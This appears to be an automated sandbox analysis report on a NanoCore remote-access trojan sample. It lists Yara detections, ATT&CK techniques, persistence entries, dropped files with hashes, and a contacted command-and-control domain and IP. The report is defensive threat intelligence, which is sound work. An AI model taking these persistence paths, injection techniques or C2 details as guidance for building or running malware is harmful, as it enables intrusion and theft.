        Source: RegAsm.exe, 00000003.00000002.250629843.0000000004451000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 00000002.00000003.255242846.0000000000FA4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.211542928.00000000038E2000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.209839006.00000000010BD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.249609796.0000000000402000.00000020.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000003.254683276.0000000001181000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.209991404.00000000010E7000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.209808084.0000000001147000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.209532145.0000000001114000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000003.231856687.000000000112F000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000003.230915051.0000000001129000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000003.231281467.0000000001180000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000003.230856862.00000000011B4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000003.254526561.00000000011E6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000003.254613953.00000000011B3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000003.254797061.0000000000F9F000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000003.231188805.0000000001154000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.250629843.0000000004451000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.210637735.000000000106B000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000003.232736755.0000000000E62000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000003.231305365.0000000001181000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000003.231549555.00000000010FD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.250595233.0000000003451000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.210116902.00000000010E7000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.210229940.0000000001114000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000003.231711637.00000000010FD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: DiagnosticsHub.StandardCollector.Service.exe.bat PID: 5944, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4332, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: d4e475d7d17a16be8b9eeac6e10b25af.exe PID: 576, type: MEMORY
        Source: Yara matchFile source: 2.3.DiagnosticsHub.StandardCollector.Service.exe.bat.e60000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.d4e475d7d17a16be8b9eeac6e10b25af.exe.38e0000.0.unpack, type: UNPACKEDPE
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_00436596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,2_2_00436596
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_00436A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_00436A5A

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts2Native API1Startup Items1Startup Items1Disable or Modify Tools11Input Capture31System Time Discovery2Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
        Default AccountsScheduled Task/JobDLL Side-Loading1Exploitation for Privilege Escalation1Deobfuscate/Decode Files or Information11LSASS MemoryAccount Discovery1Remote Desktop ProtocolInput Capture31Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Application Shimming1DLL Side-Loading1Obfuscated Files or Information2Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesClipboard Data2Automated ExfiltrationRemote Access Software1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Valid Accounts2Application Shimming1Software Packing11NTDSSystem Information Discovery26Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol1SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronRegistry Run Keys / Startup Folder2Valid Accounts2DLL Side-Loading1LSA SecretsSecurity Software Discovery4SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol11Manipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonAccess Token Manipulation21Masquerading12Cached Domain CredentialsVirtualization/Sandbox Evasion4VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsProcess Injection412Valid Accounts2DCSyncProcess Discovery3Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobRegistry Run Keys / Startup Folder2Virtualization/Sandbox Evasion4Proc FilesystemApplication Window Discovery11Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Access Token Manipulation21/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
        Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Process Injection412Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
        Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronHidden Files and Directories1Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 320928 Sample: d4e475d7d17a16be8b9eeac6e10b25af Startdate: 20/11/2020 Architecture: WINDOWS Score: 100 30 windowslivesoffice.ddns.net 2->30 38 Found malware configuration 2->38 40 Malicious sample detected (through community Yara rule) 2->40 42 Antivirus / Scanner detection for submitted sample 2->42 44 8 other signatures 2->44 7 d4e475d7d17a16be8b9eeac6e10b25af.exe 5 2->7         started        11 DiagnosticsHub.StandardCollector.Service.exe.bat 2->11         started        13 dhcpmon.exe 4 2->13         started        signatures3 process4 file5 28 DiagnosticsHub.Sta...tor.Service.exe.bat, PE32 7->28 dropped 46 Contains functionality to inject code into remote processes 7->46 48 Writes to foreign memory regions 7->48 50 Allocates memory in foreign processes 7->50 15 RegAsm.exe 1 10 7->15         started        52 Antivirus detection for dropped file 11->52 54 Binary is likely a compiled AutoIt script file 11->54 56 Injects a PE file into a foreign processes 11->56 20 RegAsm.exe 3 11->20         started        22 conhost.exe 13->22         started        signatures6 process7 dnsIp8 32 windowslivesoffice.ddns.net 192.190.19.55, 20377 COGENT-174US Canada 15->32 34 127.0.0.1 unknown unknown 15->34 24 C:\Users\user\AppData\Roaming\...\run.dat, data 15->24 dropped 26 C:\Program Files (x86)\...\dhcpmon.exe, PE32 15->26 dropped 36 Hides that the sample has been downloaded from the Internet (zone.identifier) 15->36 file9 signatures10

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        d4e475d7d17a16be8b9eeac6e10b25af.exe67%VirustotalBrowse
        d4e475d7d17a16be8b9eeac6e10b25af.exe41%MetadefenderBrowse
        d4e475d7d17a16be8b9eeac6e10b25af.exe71%ReversingLabsWin32.Trojan.Nymeria
        d4e475d7d17a16be8b9eeac6e10b25af.exe100%AviraHEUR/AGEN.1100084

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat100%AviraHEUR/AGEN.1100084
        C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe0%MetadefenderBrowse
        C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe0%ReversingLabs

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        0.0.d4e475d7d17a16be8b9eeac6e10b25af.exe.8f0000.0.unpack100%AviraHEUR/AGEN.1100084Download File
        2.0.DiagnosticsHub.StandardCollector.Service.exe.bat.3c0000.0.unpack100%AviraHEUR/AGEN.1100084Download File
        3.2.RegAsm.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        0.3.d4e475d7d17a16be8b9eeac6e10b25af.exe.38e0000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        2.3.DiagnosticsHub.StandardCollector.Service.exe.bat.e60000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        2.2.DiagnosticsHub.StandardCollector.Service.exe.bat.3c0000.0.unpack100%AviraHEUR/AGEN.1100084Download File

        Domains

        No Antivirus matches

        URLs

        No Antivirus matches

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        windowslivesoffice.ddns.net
        		192.190.19.55
        		truetrue
          		unknown

          Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public

          IPDomainCountryFlagASNASN NameMalicious
          192.190.19.55
          		unknownCanada
          		174COGENT-174UStrue

          Private

          IP
          127.0.0.1

          General Information

          Joe Sandbox Version:31.0.0 Red Diamond
          Analysis ID:320928
          Start date:20.11.2020
          Start time:07:23:08
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 8m 43s
          Hypervisor based Inspection enabled:false
          Report type:full
          Sample file name:d4e475d7d17a16be8b9eeac6e10b25af (renamed file extension from none to exe)
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Number of analysed new started processes analysed:29
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal100.troj.evad.winEXE@8/7@8/2
          EGA Information:Failed
          HDC Information:Failed
          HCA Information:Failed
          Cookbook Comments:
          • Adjust boot time
          • Enable AMSI
          Warnings:
          Show All
          • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
          • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
          • Excluded IPs from analysis (whitelisted): 52.255.188.83, 51.104.139.180, 92.122.144.200, 20.54.26.129, 95.101.22.134, 95.101.22.125
          • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs.microsoft.com, db3p-ris-pf-prod-atm.trafficmanager.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, umwatsonrouting.trafficmanager.net, skypedataprdcoleus17.cloudapp.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
          • Report size exceeded maximum capacity and may have missing disassembly code.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.

          Simulations

          Behavior and APIs

          TimeTypeDescription
          07:23:59AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinSAT.lnk
          07:24:01API Interceptor1025x Sleep call for process: RegAsm.exe modified
          07:24:12AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe

          Joe Sandbox View / Context

          IPs

          No context

          Domains

          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          windowslivesoffice.ddns.nete5bd3238d220c97cd4d6969abb3b33e0.exeGet hashmaliciousBrowse
          • 87.65.28.27
          1c2dec9cbfcd95afe13bf71910fdf95f.exeGet hashmaliciousBrowse
          • 87.65.28.27
          Xf6v0G2wIM.exeGet hashmaliciousBrowse
          • 87.65.28.27
          jztWD1iKrC.exeGet hashmaliciousBrowse
          • 87.65.28.27
          wH22vdkhhU.exeGet hashmaliciousBrowse
          • 87.65.28.27
          AqpOn6nwXS.exeGet hashmaliciousBrowse
          • 87.65.28.27
          CklrD7MYX2.exeGet hashmaliciousBrowse
          • 87.65.28.27
          FahZG6Pdc4.exeGet hashmaliciousBrowse
          • 87.65.28.27
          61WlCsQR9Q.exeGet hashmaliciousBrowse
          • 87.65.28.27
          U7DiqWP9qu.exeGet hashmaliciousBrowse
          • 87.65.28.27
          d4x5rI09A7.exeGet hashmaliciousBrowse
          • 87.65.28.27
          1WW425NrsA.exeGet hashmaliciousBrowse
          • 87.65.28.27
          Kyd6mztyQ5.exeGet hashmaliciousBrowse
          • 87.65.28.27
          xdNg7FUNS2.exeGet hashmaliciousBrowse
          • 87.65.28.27
          14muK1SuRQ.exeGet hashmaliciousBrowse
          • 87.65.28.27
          9fPECeVI6R.exeGet hashmaliciousBrowse
          • 87.65.28.27
          EkOjz981VJ.exeGet hashmaliciousBrowse
          • 87.65.28.27
          2WSPzeEKDI.exeGet hashmaliciousBrowse
          • 87.65.28.27
          wDbrNH1KqV.exeGet hashmaliciousBrowse
          • 87.65.28.27
          btxqAmncf4.exeGet hashmaliciousBrowse
          • 87.65.28.27

          ASN

          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          COGENT-174UShttps://rebrand.ly/we9znGet hashmaliciousBrowse
          • 154.59.122.79
          http://tinyurl.comGet hashmaliciousBrowse
          • 154.59.122.74
          https://gooten.staging.vigetx.com/login.htmlGet hashmaliciousBrowse
          • 38.97.80.199
          https://www.kirche-die-weiter-geht.de/?email=bouaoudm@qcb.gov.qaGet hashmaliciousBrowse
          • 38.97.80.199
          procmon.exeGet hashmaliciousBrowse
          • 38.108.185.64
          https://firebasestorage.googleapis.com/v0/b/vvvvvvv-vvvvvvvv-vvvvvv.appspot.com/o/6j-5h5rtb-h4-5egr-5g5er%2F53-grf-3-4fw-e43-f4-f.html?alt=media&token=99d307bc-f2b9-4d29-9a6d-bfd8036d7f1e#john.doe@milking.comGet hashmaliciousBrowse
          • 38.97.80.199
          INQUIRY-11062020_PDF .exeGet hashmaliciousBrowse
          • 38.108.185.79
          ElectionInterference_626909835.xlsGet hashmaliciousBrowse
          • 74.221.216.140
          ElectionInterference_626909835.xlsGet hashmaliciousBrowse
          • 74.221.216.140
          http://facility-trust.com/editdirect/images/login.html#is_department@qcb.gov.qaGet hashmaliciousBrowse
          • 38.97.80.199
          http://facility-trust.com/editdirect/images/login.html#bouaoudm@qcb.gov.qaGet hashmaliciousBrowse
          • 38.97.80.199
          http://egawakikou.com/editdirect/images/login.html#cybersecuritysection@qcb.gov.qaGet hashmaliciousBrowse
          • 38.97.80.199
          http://3ladies.suGet hashmaliciousBrowse
          • 154.47.36.75
          http://mirror.ette.bizGet hashmaliciousBrowse
          • 38.105.93.109
          AWESHBBET4UoPiY9.docGet hashmaliciousBrowse
          • 185.142.236.163
          TRANSACTION A CONFIRMER .PDF.jarGet hashmaliciousBrowse
          • 154.44.177.60
          TRANSACTION A CONFIRMER .PDF.jarGet hashmaliciousBrowse
          • 154.44.177.60
          https://tinyurl.com/y4w2x5ys.Get hashmaliciousBrowse
          • 154.59.122.79
          atqwZDvY.exeGet hashmaliciousBrowse
          • 23.237.25.182
          http://www.onionringsandthings.comGet hashmaliciousBrowse
          • 154.59.122.79

          JA3 Fingerprints

          No context

          Dropped Files

          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          C:\Program Files (x86)\DHCP Monitor\dhcpmon.exee5bd3238d220c97cd4d6969abb3b33e0.exeGet hashmaliciousBrowse
            1c2dec9cbfcd95afe13bf71910fdf95f.exeGet hashmaliciousBrowse
              Xf6v0G2wIM.exeGet hashmaliciousBrowse
                jztWD1iKrC.exeGet hashmaliciousBrowse
                  wH22vdkhhU.exeGet hashmaliciousBrowse
                    AqpOn6nwXS.exeGet hashmaliciousBrowse
                      CklrD7MYX2.exeGet hashmaliciousBrowse
                        FahZG6Pdc4.exeGet hashmaliciousBrowse
                          61WlCsQR9Q.exeGet hashmaliciousBrowse
                            U7DiqWP9qu.exeGet hashmaliciousBrowse
                              d4x5rI09A7.exeGet hashmaliciousBrowse
                                1WW425NrsA.exeGet hashmaliciousBrowse
                                  Kyd6mztyQ5.exeGet hashmaliciousBrowse
                                    xdNg7FUNS2.exeGet hashmaliciousBrowse
                                      14muK1SuRQ.exeGet hashmaliciousBrowse
                                        9fPECeVI6R.exeGet hashmaliciousBrowse
                                          EkOjz981VJ.exeGet hashmaliciousBrowse
                                            2WSPzeEKDI.exeGet hashmaliciousBrowse
                                              wDbrNH1KqV.exeGet hashmaliciousBrowse
                                                btxqAmncf4.exeGet hashmaliciousBrowse

                                                  Created / dropped Files

                                                  C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                  Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):53248
                                                  Entropy (8bit):4.490095782293901
                                                  Encrypted:false
                                                  SSDEEP:768:0P2Bbv+VazyoD2z9TU//1mz1+M9GnLEu+2wTFRJS8Ulg:HJv46yoD2BTNz1+M9GLfOw8UO
                                                  MD5:529695608EAFBED00ACA9E61EF333A7C
                                                  SHA1:68CA8B6D8E74FA4F4EE603EB862E36F2A73BC1E5
                                                  SHA-256:44F129DE312409D8A2DF55F655695E1D48D0DB6F20C5C7803EB0032D8E6B53D0
                                                  SHA-512:8FE476E0185B2B0C66F34E51899B932CB35600C753D36FE102BDA5894CDAA58410044E0A30FDBEF76A285C2C75018D7C5A9BA0763D45EC605C2BBD1EBB9ED674
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Joe Sandbox View:
                                                  • Filename: e5bd3238d220c97cd4d6969abb3b33e0.exe, Detection: malicious, Browse
                                                  • Filename: 1c2dec9cbfcd95afe13bf71910fdf95f.exe, Detection: malicious, Browse
                                                  • Filename: Xf6v0G2wIM.exe, Detection: malicious, Browse
                                                  • Filename: jztWD1iKrC.exe, Detection: malicious, Browse
                                                  • Filename: wH22vdkhhU.exe, Detection: malicious, Browse
                                                  • Filename: AqpOn6nwXS.exe, Detection: malicious, Browse
                                                  • Filename: CklrD7MYX2.exe, Detection: malicious, Browse
                                                  • Filename: FahZG6Pdc4.exe, Detection: malicious, Browse
                                                  • Filename: 61WlCsQR9Q.exe, Detection: malicious, Browse
                                                  • Filename: U7DiqWP9qu.exe, Detection: malicious, Browse
                                                  • Filename: d4x5rI09A7.exe, Detection: malicious, Browse
                                                  • Filename: 1WW425NrsA.exe, Detection: malicious, Browse
                                                  • Filename: Kyd6mztyQ5.exe, Detection: malicious, Browse
                                                  • Filename: xdNg7FUNS2.exe, Detection: malicious, Browse
                                                  • Filename: 14muK1SuRQ.exe, Detection: malicious, Browse
                                                  • Filename: 9fPECeVI6R.exe, Detection: malicious, Browse
                                                  • Filename: EkOjz981VJ.exe, Detection: malicious, Browse
                                                  • Filename: 2WSPzeEKDI.exe, Detection: malicious, Browse
                                                  • Filename: wDbrNH1KqV.exe, Detection: malicious, Browse
                                                  • Filename: btxqAmncf4.exe, Detection: malicious, Browse
                                                  Reputation:moderate, very likely benign file
                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....{Z..................... .......... ........@.. ..............................N.....@.....................................O................................... ................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\RegAsm.exe.log
                                                  Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):525
                                                  Entropy (8bit):5.2874233355119316
                                                  Encrypted:false
                                                  SSDEEP:12:Q3LaJU20NaL10U29hJ5g1B0U2ukyrFk70Ug+9Yz9tv:MLF20NaL329hJ5g522rWz2T
                                                  MD5:61CCF53571C9ABA6511D696CB0D32E45
                                                  SHA1:A13A42A20EC14942F52DB20FB16A0A520F8183CE
                                                  SHA-256:3459BDF6C0B7F9D43649ADAAF19BA8D5D133BCBE5EF80CF4B7000DC91E10903B
                                                  SHA-512:90E180D9A681F82C010C326456AC88EBB89256CC769E900BFB4B2DF92E69CA69726863B45DFE4627FC1EE8C281F2AF86A6A1E2EF1710094CCD3F4E092872F06F
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..
                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\dhcpmon.exe.log
                                                  Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:modified
                                                  Size (bytes):20
                                                  Entropy (8bit):3.6841837197791887
                                                  Encrypted:false
                                                  SSDEEP:3:QHXMKas:Q3Las
                                                  MD5:B3AC9D09E3A47D5FD00C37E075A70ECB
                                                  SHA1:AD14E6D0E07B00BD10D77A06D68841B20675680B
                                                  SHA-256:7A23C6E7CCD8811ECDF038D3A89D5C7D68ED37324BAE2D4954125D9128FA9432
                                                  SHA-512:09B609EE1061205AA45B3C954EFC6C1A03C8FD6B3011FF88CF2C060E19B1D7FD51EE0CB9D02A39310125F3A66AA0146261BDEE3D804F472034DF711BC942E316
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview: 1,"fusion","GAC",0..
                                                  C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
                                                  Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8
                                                  Entropy (8bit):3.0
                                                  Encrypted:false
                                                  SSDEEP:3:Fo:C
                                                  MD5:C8C55F14E620A40AF72BA9FB954B53B7
                                                  SHA1:26204CA80EDC41FE334D14B13D7D362ED1BDB63A
                                                  SHA-256:B31C3E533C19283D0E1C6293836D503DCB4D849FA80406E8BA9B2F93069EA3D3
                                                  SHA-512:1C82B305A1E20711004A386DFD610C3335DD7EC7F14459F95935A36B6AD37FB45085EFD251B82F298823816E72AFC95416BC4B44FFBA2D5E151B02CB0F511EB6
                                                  Malicious:true
                                                  Reputation:low
                                                  Preview: ...Oh..H
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinSAT.lnk
                                                  Process:C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exe
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Nov 20 14:23:58 2020, mtime=Fri Nov 20 14:23:58 2020, atime=Fri Nov 20 14:23:58 2020, length=1124928, window=hide
                                                  Category:dropped
                                                  Size (bytes):1049
                                                  Entropy (8bit):4.993550060752574
                                                  Encrypted:false
                                                  SSDEEP:12:8b1y4gqqWOCenvRPIqsFwcAjApvUhy52t6RPIqsFw2wuLMb65bW4t2Y+xIBjKZm:8JgqdOXvNcUApOE2t6N2Vc7aB6m
                                                  MD5:9605AC37B3F6DE1696D5748CEF890D4F
                                                  SHA1:6EA4664E24A6B40707294E0C2C94FF0D3D29E873
                                                  SHA-256:2E6D3FF6EE73345692DEE4CA6BDCC2654876AB71A228E3C1E7B3108C08E2D22F
                                                  SHA-512:E2D0D9C0256753B62E9A20897559299DACEFBBF1BFDE6D526836A73B121D74F31BAA66937C64BC50D4E9A7F0874DAB387BECA861E2664D81245ACFD389CC04A9
                                                  Malicious:false
                                                  Reputation:low
